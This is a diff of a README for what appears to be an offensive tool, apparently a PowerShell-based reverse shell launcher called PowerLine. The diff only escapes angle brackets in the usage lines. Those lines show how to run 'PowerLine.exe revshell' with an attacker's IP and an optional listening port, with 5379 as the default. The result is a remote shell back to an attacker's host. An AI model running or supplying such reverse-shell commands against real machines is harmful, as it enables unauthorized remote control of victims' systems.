rtaylor777/ps_cmd_rev_shell/README.md

 You can run it like this, from a CMD prompt:

-PowerLine.exe reveshell "revshell -hostip <attackrs IP>"
+PowerLine.exe reveshell "revshell -hostip &lt;attackrs IP&gt;"

 Or if you are listening on a different port than 5379:

-PowerLine.exe revshell "revshell -hostip <attackers IP> -port <desired port>"
+PowerLine.exe revshell "revshell -hostip &lt;attackers IP&gt; -port &lt;desired port&gt;"

 **PowerLine.vbs**